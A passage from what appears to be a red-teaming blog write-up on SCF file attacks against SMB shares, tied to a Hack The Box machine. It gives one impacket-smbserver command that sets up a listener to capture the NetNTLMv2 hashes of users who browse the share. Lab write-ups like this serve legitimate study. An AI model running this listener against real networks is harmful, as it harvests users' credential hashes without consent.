NoRed0x/NoRed0x.github.io/_posts/Red-Teaming/2021-10-12-smb-share-scf-file-attacks.md

 a challenge request is requested by the attacker, a challenger response is then returned to use with the NetNTLMv2.

 ## set listener
+set listener  to capture the hashes of the users that will browse the share
 ```
 impacket-smbserver -debug -smb2support share /home/nored0x/Desktop/HTB/driver
 ```